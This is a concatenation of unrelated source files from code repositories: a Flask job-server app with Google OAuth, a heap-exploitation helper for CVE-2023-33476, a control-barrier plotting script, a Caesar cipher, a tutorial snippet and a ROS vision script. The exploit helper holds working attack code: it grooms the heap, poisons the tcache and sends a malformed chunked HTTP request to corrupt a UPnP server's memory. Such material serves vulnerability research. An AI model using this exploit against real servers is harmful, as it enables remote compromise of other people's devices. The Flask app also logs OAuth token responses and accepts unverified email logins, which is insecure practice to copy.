    '\n return sdat.make_response(msg)\n\n@app.route(\"/login\")\ndef login():\n google_provider_cfg = requests.get(GOOGLE_DISCOVERY_URL).json()\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n redirect_uri = fixurl(request.base_url) + \"/callback\"\n # For anything but local host, make sure redirect is https.\n if redirect_uri[0:5] == 'http:' and redirect_uri.find('localhost') < 0 and redirect_uri.find('127.0.0.1') < 0:\n redirect_uri = redirect_uri.replace('http:', 'https:')\n if SessionData.dbg: print(f\"login: URI: {redirect_uri}\")\n scope=[\"openid\", \"email\", \"profile\"]\n request_uri = client.prepare_request_uri(\n authorization_endpoint,\n redirect_uri=redirect_uri,\n scope=scope\n )\n if SessionData.dbg: print(f\"login: Auth: {authorization_endpoint}\")\n if SessionData.dbg: print(f\"login: Request: {request_uri}\")\n res = redirect(request_uri)\n if SessionData.dbg: print(f\"login: Result: {res}\")\n return res\n\n@app.route(\"/logout\")\ndef logout():\n sdat = SessionData.get()\n if sdat is None:\n print('logout: Logout requested without login. Might be expired.')\n else:\n del SessionData.sessions[sdat.sesskey]\n session['sesskey'] = None\n SessionData.current = SessionData.nologin_session()\n return redirect(url_for('home'))\n\n@app.route(\"/help\")\ndef help():\n return render_template('help.html')\n\n@app.route(\"/bye\")\ndef bye():\n print(\"bye: Shutting down.\")\n com = f\"sleep 3; kill -9 {os.getpid()}\"\n subprocess.Popen(com, shell=True)\n sdat = SessionData.get()\n sdat.msg += ['Restarting server.']\n return redirect(url_for('home'))\n\n@app.route(\"/login/callback\")\ndef callback():\n if SessionData.dbg: print('callback: Handling google callback')\n # Fetch tokens.\n code = request.args.get(\"code\")\n google_provider_cfg = requests.get(GOOGLE_DISCOVERY_URL).json()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n if request.is_secure:\n authresp = fixurl(request.url)\n else:\n authresp = None\n print(f\"callback: **************** authresp: {authresp}\")\n token_url, headers, body = client.prepare_token_request(\n token_endpoint,\n authorization_response = authresp,\n redirect_url = fixurl(request.base_url),\n code = code\n )\n if SessionData.dbg:\n print('callback: --------- BEGIN Token post')\n print(f\"callback: token_url: {token_url}\")\n print(f\"callback: headers: {headers}\")\n print(f\"callback: token_url: {token_url}\")\n print(f\"callback: data: {body}\")\n print(f\"callback: auth: {GOOGLE_CLIENT_ID}, *****\")\n print('callback: --------- END Token response')\n token_response = requests.post(\n token_url,\n headers=headers,\n data=body,\n auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET),\n )\n resp = token_response.json()\n if SessionData.dbg:\n print('callback: --------- BEGIN Token response')\n for key in resp:\n print(f\"callback: {key}: {resp[key]}\")\n print('callback: --------- END Token response')\n # Parse tokens and fetch user profile.\n client.parse_request_body_response(json.dumps(resp))\n userinfo_endpoint = google_provider_cfg[\"userinfo_endpoint\"]\n uri, headers, body = client.add_token(userinfo_endpoint)\n userinfo_response = requests.get(uri, headers=headers, data=body)\n login_info = userinfo_response.json()\n google_id = login_info[\"sub\"]\n fullname = login_info[\"name\"]\n user_label = f\"{fullname} ({google_id})\"\n #print(f\"callback: User info: {login_info\")\n resp = redirect(url_for('home'))\n sdat = SessionData.nologin_session()\n sesskey = None\n email = 
userinfo_response.json().get(\"email\")\n have_email = len(email) > 0\n email_verified = userinfo_response.json().get(\"email_verified\")\n # 06jan2023 Allow unverified email.\n verified = email_verified or have_email\n if verified:\n if google_id in SessionData.google_ids:\n print(f\"callback: Authorizing {user_label}\")\n login_info = userinfo_response.json()\n if SessionData.use_cookie_key:\n # The cookie is created in sdat.make_response\n # We need a string key.\n sesskey = ''.join(secrets.choice(string.ascii_letters+string.digits) for i in range(24))\n else:\n sesskey = app.secret_key = os.urandom(16)\n session['sesskey'] = sesskey\n session['fullname'] = fullname\n session.permanent = True # This enables the session to expire\n descname = SessionData.google_ids[google_id][0]\n else:\n print(f\"callback: Denying unauthorized user {user_label} [{email}]\")\n sdat.msg.append(f\"User not authorized: {google_id} {fullname}\")\n sdat.msg.append(f\"\\n
    Send the above line and your NERSC user name to admin@descprod.org to request authorization.\")\n else:\n print(f\"callback: Denying unverified user {user_label} [{email}]\")\n if not email_verified: sdat.msg.append(f\"User has not verified email with google: {fullname} [{email}]\")\n if not have_email: sdat.msg.append(f\"User does not have email with google: {fullname} [{google_id}]\")\n if sesskey is not None:\n sdat = SessionData(sesskey, descname, fullname, login_info)\n if not SessionData.use_cookie_key:\n session['session_id'] = sdat.session_id\n SessionData.current = sdat\n return redirect(url_for('home'))\n\n@app.route(\"/versions\")\ndef versions():\n #return f\"{os.getcwd()}
<br>{__file__}\"\n    sep = '<br>
    \\n'\n tbl = {}\n tbl['Python'] = subprocess.getoutput('echo $(python --version)')\n tbl['desc-prod'] = subprocess.getoutput('descprod-version')\n wprod = 0\n for prod in tbl:\n wprod = max(wprod, len(prod))\n outmsg = []\n for prod in tbl:\n outmsg += [f\"{prod.rjust(wprod+4)}: {tbl[prod]}\"]\n SessionData.get().msg = outmsg\n return redirect(url_for('home'))\n\n@app.route(\"/pmstatus\")\ndef pmstatus():\n sfapi = Sfapi()\n SessionData.get().msg = sfapi.get_status()\n return redirect(url_for('home'))\n return msg\n\n@app.route(\"/hello\")\ndef hello():\n name = ''\n if len(request.args):\n for snam in request.args:\n name += ' ' + snam\n else:\n name = ' NOONE'\n sdat = SessionData.get()\n if len(sdat.msg) == 0:\n sdat.msg = [\"

<center><h1>Hellos from desc-prod</h1></center>\"]\n    sdat.msg += [f\"hello{name}<br>
    \"]\n return redirect(url_for('home'))\n\n@app.route('/form_create_job/', methods=['POST', 'GET'])\ndef run_form_create_job():\n if request.method == 'GET':\n return 'Got GET instead of POST!!'\n sdat = SessionData.get()\n jty = request.form['jobtype'].strip()\n #known_jty = ['parsltest']\n #if jty not in known_jty:\n # SessionData.get().msg.append(f\"Invalid job type: {jty}\")\n # return redirect(url_for('home'))\n cfg = request.form['config'].strip()\n hfg = request.form['howfig'].strip()\n print(f\"form_create_job: {jty} {cfg} {hfg}\")\n return do_create_job(jty, cfg, hfg)\n\ndef do_create_job(jty, cfg, hfg):\n myname = 'do_create_job'\n sdat = SessionData.get()\n if len(cfg) == 0:\n sdat.msg.append('Configuration must be provided when creating a job.')\n return redirect(url_for('home'))\n sid = sdat.session_id\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to make a job request')\n return redirect(url_for('home'))\n jobid = get_jobid()\n jdat = JobData(jobid, udat.descname)\n if len(jdat.errmsgs):\n sdat.msg.append(jdat.errmsgs)\n return redirect(url_for('home'))\n if jdat.configure(jty, cfg, hfg, sid):\n sdat.msg += jdat.errmsgs\n return redirect(url_for('home'))\n sdat.msg.append(f\"Configured {jty} {cfg} {hfg}\")\n udat.jobtype = jty\n udat.config = cfg\n udat.howfig = hfg\n return redirect(url_for('home'))\n\n@app.route('/startjob')\ndef start_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to start a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n return redirect(url_for('home'))\n cmsg = job.ready_to_run()\n if len(cmsg):\n sdat.msg.append(f\"Job {jobid} is not ready to run. 
{cmsg}\")\n return redirect(url_for('home'))\n if job.run():\n sdat.msg = job.errmsgs\n return redirect(url_for('home'))\n sdat.msg.append(f\"Started job {jobid} for user {job.descname()} in {job.rundir()}\")\n return redirect(url_for('home'))\n\n@app.route('/archivejob')\ndef archive_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to archive a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n else:\n arcfil = job.archive()\n if arcfil is None:\n sdat.msg.append(f\"Unable to archive Job {jobid} for user {udat.descname}\")\n else:\n sdat.msg.append(f\"Job archived at {arcfil}\")\n return redirect(url_for('home'))\n\n@app.route('/deletejob')\ndef delete_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to delete a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n else:\n delfil = job.delete()\n if delfil is not None:\n sdat.msg.append(f\"Job {jobid} scheduled for deletion at {delfil}\")\n return redirect(url_for('home'))\n\n@app.route('/copyjob')\ndef copy_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to delete a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n else:\n udat.jobtype = job.jobtype()\n udat.config = job.config()\n udat.howfig = job.howfig()\n return redirect(url_for('home'))\n\ndef ready():\n if SessionData.sjob is None: return True\n rcode = SessionData.ret.poll()\n if rcode is None: return False\n # Post job actions go here.\n return True\n\n@app.route('/status')\ndef status():\n if SessionData.sjob is None:\n msg = \"No job is started.\"\n else:\n rcode = SessionData.ret.poll()\n if ready():\n msg = f\"Job {SessionData.sjobid} returned {SessionData.ret.poll()}.\"\n else:\n msg = f\"Job {SessionData.sjobid} is running.\"\n return msg\n\n\n@app.route('/session')\ndef show_session():\n print(session)\n msg = 'Session data:\\n'\n for key in session.keys():\n msg += f\"
    {key}: {session[key]}\\n\"\n    print(msg)\n    SessionData.get().msg = msg\n    return redirect(url_for('home'))\n\n@app.route(\"/request\")\n@app.route(\"/<path:path>\")\ndef req(path):\n    sdat = SessionData.get()\n    sdat.msg.append(f\"Invalid command: {request.url}\")\n    print(f\"req: Ignoring request {request.url}\")\n    return redirect(url_for('home'))\n    msg = ''\n    msg += f\" url: {request.url}

<br><br>\"\n    msg += f\"root path: {request.root_path}<br><br>\"\n    msg += f\" path: {request.path}<br><br>\"\n    msg += f\" method: {request.method}<br><br>\"\n    msg += f\" endp: {request.endpoint}<br><br>\"\n    msg += f\" args: {request.args}<br><br>\"\n    msg += f\" form: {request.form}<br><br>\"\n    msg += f\" data: {request.data.decode('UTF-8')}<br><br>\"\n    msg += f\" json:\"\n    if request.is_json:\n        msg += f\"{request.get_json()}\"\n    msg += f\"<br><br>\"\n    msg += f\" get data: {request.get_data().decode('UTF-8')}<br><br>
    \"\n return msg\n\n@app.route('/favicon.ico')\ndef got_favicon():\n print(f\"got_favicon: Ignoring request {request.url}\")\n return {}\n\n@app.route('/get_job', methods=['POST'])\ndef get_job():\n \"\"\"Handle request to return a job.\"\"\"\n rst = 0\n msg = 'Success.'\n rec = request.json\n missingkeys = []\n for key in ['descname', 'id']:\n if key not in rec: missingkeys += [key]\n if len(missingkeys):\n return {'status':1, 'message':f\"Missing keys in request: {missingkeys}\"}\n jid = int(rec['id'])\n descname = rec['descname']\n job = JobData.get_user_job(descname, jid, usedb=True)\n if job is None:\n return {'status':2, 'message':f\"Job {jid} not found for user {descname}.\"}\n jmap = job.jmap()\n return {'status':0, 'message':'Success', 'job':jmap}\n\n@app.route('/update_job', methods=['POST', 'GET'])\ndef update_job():\n \"\"\"Handle request to update a job.\"\"\"\n if request.method == 'GET':\n return 'Got GET instead of POST!!'\n rec = request.json\n if 'job' not in rec: return {'status':1, 'message':'Request does not include job'}\n jmap = rec['job']\n for nam in ['id', 'descname', 'update_time']:\n if nam not in jmap: return {'status':2, 'message':f\"Request job does not have field {nam}\"}\n if jmap[nam] is None: return {'status':3, 'message':f\"Request job does not have a value for field {nam}\"}\n jid = jmap['id']\n descname = jmap['descname']\n job = JobData.get_user_job(descname, jid, usedb=True)\n if job is None:\n otim = 0\n else:\n otim = job.update_time()\n if otim is None:\n otim = 0\n print(f\"update_job: WARNING: Handling job {descname}/{jid} with missing update time.\")\n utim = jmap['update_time']\n try:\n dtim = utim - otim\n except:\n return {'status':4, 'message':f\"Invalid time interval: {utim} - {otim}\"}\n if job is None: return {'status':5, 'message':f\"Job {jid} not found for user {descname}\"}\n if dtim <= 0: return {'status':6, 'message':f\"Job {descname}/{jid}: Update is {-dtim} seconds behind current job.\"}\n errmsg = job.jmap_update(jmap)\n if len(errmsg): return {'status':5, 'message':f\"Job {descname}/{jid}: {errmsg}\"}\n return {'status':0}\n\n@app.route('/add_child_job', methods=['POST', 'GET'])\ndef add_child_job():\n \"\"\"Handle request to add a job.\"\"\"\n if request.method == 'GET':\n return 'Got GET instead of POST!!'\n jmap = request.json\n for nam in ['jobtype', 'config', 'parent', 'descname']:\n if nam not in jmap: return {'status':1, 'message':f\"Request to add child job does not have field {nam}\"}\n if jmap[nam] is None: return {'status':2, 'message':f\"Request to add child job does not have a value for field {nam}\"}\n jobtype = jmap['jobtype']\n cfg = jmap['config']\n hfg = jmap['howfig']\n parent = int(jmap['parent'])\n descname = jmap['descname']\n # Require parent has the same username.\n pjob = JobData.get_user_job(descname, parent, usedb=True)\n if pjob is None:\n return {'status':3, 'message':f\"Parent job {descname}/{parent} was not found\"}\n sid = pjob.session()\n jid = get_jobid()\n jdat = JobData(jid, descname)\n if jdat.configure(jobtype, cfg, hfg, sid, parent):\n return {'status':4, 'message':jdat.errmsgs[-1]}\n print(f\"add_child_job: Added and configured child job {descname}/{jid}: {jobtype} {cfg}\")\n return {'status':0, 'job':jdat.jmap()}\n","repo_name":"LSSTDESC/desc-prod","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":29974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12314401340","text":"#!/usr/bin/env 
python3\nimport pwn\nimport os\nimport sys\nimport socket\nimport time\n\nTIME = 0.2\nALLOC_SIZE = 0x60-8\n\nasciitxt = \"\"\"\n ___ ___ ___ ___ ___ \n / /\\ /__/\\ / /\\ /__/\\ /__/| ___ \n / /:/ \\ \\:\\ / /::\\ \\ \\:\\ | |:| /__/| \n / /:/ \\__\\:\\ / /:/\\:\\ \\ \\:\\ | |:| | |:| \n / /:/ ___ ___ / /::\\ / /:/ \\:\\ _____\\__\\:\\ __| |:| | |:| \n /__/:/ / /\\ /__/\\ /:/\\:\\ /__/:/ \\__\\:\\ /__/::::::::\\ /__/\\_|:|____ __|__|:| \n \\ \\:\\ / /:/ \\ \\:\\/:/__\\/ \\ \\:\\ / /:/ \\ \\:\\~~\\~~\\/ \\ \\:\\/:::::/ /__/::::\\ \n \\ \\:\\ /:/ \\ \\::/ \\ \\:\\ /:/ \\ \\:\\ ~~~ \\ \\::/~~~~ ~\\~~\\:\\ \n \\ \\:\\/:/ \\ \\:\\ \\ \\:\\/:/ \\ \\:\\ \\ \\:\\ \\ \\:\\ \n \\ \\::/ \\ \\:\\ \\ \\::/ \\ \\:\\ \\ \\:\\ \\__\\/\n \\__\\/ \\__\\/ \\__\\/ \\__\\/ \\__\\/ \n\"\"\"\n\n# printer for hex values in argparse output\ndef hexarg(x):\n return int(x, 16)\n\n\n# obligatory exploit printers\ndef xpr(msg):\n print(f\"[+]: {msg}\")\n\ndef debb(msg):\n print(f\"[-] {msg}\")\n\ndef xerr(msg):\n print(f\"[!] ERROR: {msg}\")\n\n# padding helper\ndef pad(size, data):\n pad_byte = b\"\\x99\"\n if len(data) > size:\n return data\n pad_size = size - len(data)\n new_data = data + (pad_byte * pad_size)\n if len(new_data) != size:\n raise Exception\n return new_data\n\n# create a single socket with keepalive \ndef singlesock(keepalive=True):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if keepalive:\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n return sock\n\n# create `count` sockets and return them in a list\ndef create_sockets(count):\n socks = []\n for i in range(0, count):\n socks.append(singlesock())\n return socks\n\n# connect the sockets in the given list of sockets `sock_list`\ndef connect_sockets(sock_list, target_ip, port, timeout=None):\n for sock in sock_list:\n sock.settimeout(timeout)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n try:\n sock.connect((target_ip, int(port)))\n except ConnectionRefusedError:\n xerr(\"connection refused, check arguments or ensure server is up\")\n sys.exit(1)\n\n# disconnect a list of sockets\ndef disconnect_all(sock_list, reverse=False):\n if reverse:\n sock_list.reverse()\n for sock in sock_list:\n sock.close()\n\n# send data on a list of open sockets\ndef sendsocks(socks_list, payload):\n for sock in socks_list:\n sock.send(payload, 2)\n time.sleep(TIME)\n\n# Class representing a payload object to trigger the bug\nclass Payload(object):\n HTTP_HEADER_PADDING_BYTE = \"K\"\n def __init__(self,\n chunk_size:int,\n whitespace_size:int,\n prepad_len:int=0,\n http_header_pad:int=0,\n inner_pad:int=0,\n total_req_size:int=0,\n ) -> None:\n self.http_chunk_size = chunk_size\n self.whitespace_pad_len = whitespace_size\n self.http_header_pad_len = http_header_pad\n self.post_chunk_pad_len = inner_pad\n\n self.prepad_len = prepad_len\n self.whitespace_buf = b\"\"\n self.prepad_buf = b\"\"\n self.http_headers = b\"\"\n self.http_body = b\"\"\n self.zero_chunk = self.make_chunk(0, 0)\n self.request_target_size = total_req_size\n self.complete = None\n\n if total_req_size > 0:\n self.compose_sized(self.whitespace_pad_len, self.request_target_size)\n\n @property\n def total_size(self):\n \"\"\"\n to be called after one of the compose functions, which will fill in the buffers\n the zero chunk isn't put here explicity but is expected to have been combined with the\n http_body\n \"\"\"\n return len(self.complete)\n\n def make_prepad(self, length:int, marker_char=\"\"):\n \"\"\"Create padding buf to prepend before HTTP 
request\"\"\"\n return b\"A\"*length\n\n def make_headers(self, padding: int):\n \"\"\"Construct the HTTP headers for the request\"\"\"\n abuf = self.HTTP_HEADER_PADDING_BYTE * padding\n payload = \"L AAAA\\r\\n\"\n payload += \"Transfer-Encoding:chunked\\r\\r\"\n payload += f\"{abuf}\\r\\n\\r\\n\"\n return payload.encode()\n\n def make_chunk(self, chunk_size:int, inner_pad:int):\n \"\"\"Construct an HTTP chunk for the request\"\"\"\n # return make_http_chunk(chunk_size, inner_pad, term=False)\n buf = \"0\" * inner_pad\n\n # convert the value from user to hex since this is how it will b interpreted by the application.\n target_chunk_hex = hex(chunk_size)[2:]\n payload = \"\"\n payload += f\"{target_chunk_hex}\\r\\n\"\n payload += f\"{buf}\\r\\n\"\n\n return payload.encode()\n\n def calculate_oob_read_size(self):\n \"\"\"calculate how far OOB from the current req buf the given CHUNK_SIZE will allow us to read\"\"\"\n NL_LEN = 2\n body_len = len(self.http_body)\n chunk_size_hex_len = len(hex(self.http_chunk_size)) - len(\"0x\")\n size_and_nl = chunk_size_hex_len + NL_LEN\n term_len = len(self.zero_chunk)\n return self.http_chunk_size - (body_len - size_and_nl) - term_len\n\n def compose_sized(self, whitespace_len, size, with_zero_chunk=True):\n \"\"\"compose a full payload while maintaining a constant request size\"\"\"\n whitespace_buf = b\"\\x20\" * whitespace_len\n http_headers = self.make_headers(self.http_header_pad_len)\n http_chunk = self.make_chunk(self.http_chunk_size, self.post_chunk_pad_len)\n min_len = len(http_headers) + whitespace_len + len(http_chunk) + len(self.zero_chunk)\n\n if min_len > size:\n xpr(f\"WARNING: minimum length required for request based on parameters exceeds defined target length of {size}\")\n bytes_left = size - min_len\n pre_padding = self.make_prepad(bytes_left)\n\n self.whitespace_pad_len = whitespace_len\n self.whitespace_buf = whitespace_buf\n self.prepad_len = bytes_left\n self.prepad_buf = pre_padding\n self.http_headers = http_headers\n self.http_body = http_chunk\n if with_zero_chunk:\n self.http_body += self.zero_chunk\n self.complete = self.prepad_buf + self.http_headers + self.whitespace_buf + self.http_body\n return self.complete\n\n def compose(self, whitespace_len, pre_pad=0, with_zero_chunk=True):\n \"\"\"compose a full payload without regard for final request size\"\"\"\n self.prepad_len = pre_pad\n self.prepad_buf = self.make_prepad(pre_pad)\n self.whitespace_buf = b\"\\x20\" * whitespace_len\n self.http_headers = self.make_headers(self.http_header_pad_len)\n self.http_body = self.make_chunk(self.http_chunk_size, self.post_chunk_pad_len)\n if with_zero_chunk:\n self.http_body += self.zero_chunk\n self.complete = self.prepad_buf + self.http_headers + self.whitespace_buf + self.http_body\n\n def dump(self):\n print(self.complete)\n\n\ndef fengshui(target_addr:int, server_ip:str, server_port:int):\n \"\"\"\n this function is used to set the heap up in a favorable manner for the exploit.\n important points to know:\n * connecting a socket creates a upnphttp struct of 0x100 size\n * sending data on a socket will allocate that many bytes, up to 2048 at time;\n * the allocation that occurs on sending data use realloc()\n\n purpose:\n * clears the tcache bin for the given size and sprays the allocations\n with payloads containing the target address we want inserted into the bin.\n * forces allocs to start happening from the top chunk, so the allocations\n become sequential in memory.\n * sequential allocs happen around the 6-7 sprays in;\n * the 
socks at the end of this list are from the start of massaged region\n * free these LIFO from the tail to ensure our next allocs for the\n corruption will come from that region\n \"\"\"\n\n # create and connect needed sockets before sending any data on any of them.\n # This should keep the allocations for the upnphttp structs separate from\n # the request buffer allocations\n GROOMING_ALLOCS = 10\n xpr(f\"starting heap grooming round, using {GROOMING_ALLOCS} allocs...\")\n dummies = create_sockets(GROOMING_ALLOCS)\n connect_sockets(dummies, server_ip, server_port)\n\n # This is the target address we want malloc to return after the chunk has\n # been corrupted\n where = pwn.pack(target_addr, 64)\n\n # create the fake chunk described above. pad with 16 bytes to skip the first\n # 2 8-byte fields which are `bk` and `fd`\n pre_pad = b\"\\x11\" * 16 # \\x11 is arbitrary\n core = pre_pad + where\n\n # pad the end of the payload with enough bytes to meet the size needed for\n # the target tcache bin allocations need to be kept the same size because\n # tcache bins must match exact sizes\n payload = pad(ALLOC_SIZE, core)\n\n # send the payload on all of the sockets we opened; this should result in 10\n # request buffer allocations; the last 3-4 will be allocated sequentially.\n sendsocks(dummies, payload)\n\n # free the last 4 allocs we made in reverse order to add those chunks to the\n # tcache bin for the matching size so they're returned to us on the next\n # allocations we make of the same size. by closing the sockets, we free\n # both the upnphttp structs and the request buffers they contain.\n dummies.pop().close()\n dummies.pop().close()\n dummies.pop().close()\n dummies.pop().close()\n\n # these need to be returned here to ensure they stay open for the remainder\n # of the exploit\n xpr(f\"heap grooming complete\")\n return dummies\n\ndef heap_corruption(malloc_return_target, target_ip, target_port):\n # a bit of setup and heap massaging to get things a bit more reliable\n dummies = fengshui(malloc_return_target, target_ip, target_port)\n\n # at this point we should have a heap layout that looks something like this\n # - { dummy upnphttp }\n # - { dummy upnphttp }\n # - { dummy upnphttp }\n # - { dummy upnphttp }\n # - { free'd upnphttp }\n # - { free'd upnphttp }\n # - { free'd upnphttp }\n # - { free'd upnphttp }\n # - { alloc'd payload spray }\n # - { alloc'd payload spray }\n # - { alloc'd payload spray } <-- sequential alloc's should start around here\n # - { alloc'd payload spray }\n # - { free'd payload spray } <-- these are free'd in reverse order so the\n # - { free'd payload spray } next alloc's we make will come from the\n # - { free'd payload spray } here\n # - { free'd payload spray }\n\n # send the request to cause the corruption and kick off the exploit\n # we use 12 bytes of whitespace padding before the chunk size value because:\n # - 8 bytes for `fd`\n # - 8 bytes for `bk` (the -4 bytes to get to 16 are accounted for\n # by the 4 bytes of the chunk size string '40\\r\\n' (0x40 = 64 chunk size)\n # chunk size of 64 since\n # - the read will start ~8 bytes from the end of the req,\n # - 16 bytes for size and prev_size chunk fields\n # - 16 bytes for `fd` and `bk`\n # - 8 bytes of payload data (the target addr)\n # - total: ~48 bytes, go a bit higher for a safety margin just in case\n xpr(f\"sending request to trigger the bug and corrupt the free'd chunks...\")\n payload = Payload(chunk_size=64, whitespace_size=12, total_req_size=ALLOC_SIZE)\n corrupt_sock = singlesock()\n 
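# (Added illustration, not part of the original exploit:) compose_sized() pads the\n    # trigger request to exactly ALLOC_SIZE (0x60-8 = 0x58) bytes, so its allocation\n    # is served from the tcache bin that fengshui() groomed above. A quick sanity\n    # check of that size invariant before connecting:\n    assert payload.total_size == ALLOC_SIZE, \"trigger request must match the groomed bin size\"\n    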
connect_sockets([corrupt_sock], target_ip, target_port)\n corrupt_sock.send(payload.complete, 2)\n time.sleep(TIME)\n corrupt_sock.close()\n xpr(f\"tcache poison complete, the bad chunk should be ready for allocation\")\n return dummies\n\n","repo_name":"mellow-hype/cve-2023-33476","sub_path":"exploits/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30298727204","text":"from Convergence import Convergence\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef single_run(cbf_para, CBF, fig_num):\r\n d_range = 2 * 10\r\n u_range = 2 * 15\r\n\r\n\r\n plt.figure(fig_num)\r\n convergence = Convergence()\r\n stop1 = 0\r\n history = []\r\n for i in range(d_range):\r\n for j in range(u_range):\r\n d = 0.5 * i\r\n u = 0.5 * j\r\n crash = convergence.examine([d, u], CBF, cbf_para)\r\n if crash == 0:\r\n plt.scatter(d,u,marker='s',color='limegreen')\r\n stop1 += 1\r\n else:\r\n plt.scatter(d,u,marker='x',color='gold')\r\n history.append([d,u,crash])\r\n plt.xlabel('d (m)')\r\n plt.ylabel('u (m/s)')\r\n plt.title(\"Barrier constraints, Np=6, $\\lambda=$\"+str(cbf_para))\r\n plt.show()\r\n\r\n print(cbf_para, stop1)\r\n name = 'history' + str(cbf_para) + '.txt'\r\n np.savetxt(name, np.array(history))\r\n\r\nif __name__ == '__main__':\r\n CBF = 0\r\n cbf_para = 1\r\n i = 0\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.7\r\n i += 1\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.4\r\n i += 1\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.1\r\n i += 1\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.01\r\n i += 1\r\n single_run(cbf_para, CBF, i)","repo_name":"ShallowDream0745/CarFollow","sub_path":"cbf_backup/cbf.py","file_name":"cbf.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12877808293","text":"\n\ndef alphabet_position(letter):\n lower_letter = letter.lower()\n alphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n return alphabet.index(lower_letter)\n\ndef rotate_character(char, rot):\n\n alphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n if str(char).isalpha():\n char_index = alphabet_position(char)\n if char.isupper():\n return alphabet[(char_index+rot)%26].upper()\n else:\n return alphabet[(char_index+rot)%26].lower()\n else:\n return char\n\n\ndef encrypt(text,rot):\n s = ''\n newText = []\n for i in range(len(text)):\n newText.append(rotate_character(text[i],int(rot)))\n return s.join(newText)\n","repo_name":"militoj/web-caesar","sub_path":"caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21780847491","text":"from operator import index, indexOf\n\n\nA = [[1, 2, 3, 4], [5, 6, 7, 8], [2, 3, 9, 3]]\n\nfor i in range(len(A)):\n for j in range(len(A[i])):\n if (i!=0 and i != len(A) - 1 ) and (j!=0 and j != len(A[i]) - 1):\n print(\" \", end='\\t')\n else:\n print(A[i][j], end='\\t')\n print('')\n\n\n# i is not 0 and i is not 2\n# j is not 0 and j is not 3\n\n# x = [1,2,3,4]\n# y = x.copy()\n\n# print(x is 
y)","repo_name":"abaddontsoi/2239","sub_path":"tutor/tutor1/tutor1_4.py","file_name":"tutor1_4.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40036876752","text":"#!/usr/bin/env python\n# abstract the input.\nimport ecto\nfrom ecto_opencv import highgui, calib, imgproc, cv_bp as cv\nfrom object_recognition.observations import *\nimport ecto_ros, ecto_sensor_msgs\nfrom ecto_object_recognition import capture\n\nImageSub = ecto_sensor_msgs.Subscriber_Image\nCameraInfoSub = ecto_sensor_msgs.Subscriber_CameraInfo\nImageBagger = ecto_sensor_msgs.Bagger_Image\nCameraInfoBagger = ecto_sensor_msgs.Bagger_CameraInfo\n\nplasm = ecto.Plasm()\n\nsubs = dict(image=ImageSub(topic_name='/camera/rgb/image_color', queue_size=0),\n depth=ImageSub(topic_name='/camera/depth_registered/image', queue_size=0),\n image_ci=CameraInfoSub(topic_name='/camera/rgb/camera_info', queue_size=0),\n depth_ci=CameraInfoSub(topic_name='/camera/depth_registered/camera_info', queue_size=0),\n )\n\nsync = ecto_ros.Synchronizer('Synchronizator', subs=subs\n )\n\nim2mat_rgb = ecto_ros.Image2Mat('rgb -> cv::Mat')\ncamera_info = ecto_ros.CameraInfo2Cv('camera_info -> cv::Mat')\nposer = OpposingDotPoseEstimator(plasm,\n rows=5, cols=3,\n pattern_type=calib.ASYMMETRIC_CIRCLES_GRID,\n square_size=0.04, debug=True)\n\nbgr2rgb = imgproc.cvtColor('rgb -> bgr', flag=imgproc.Conversion.RGB2BGR)\nrgb2gray = imgproc.cvtColor('rgb -> gray', flag=imgproc.Conversion.RGB2GRAY)\ndisplay = highgui.imshow('Poses', name='Poses', waitKey=5, autoSize=True)\n\ngraph = [sync['image'] >> im2mat_rgb[:],\n im2mat_rgb[:] >> (rgb2gray[:], 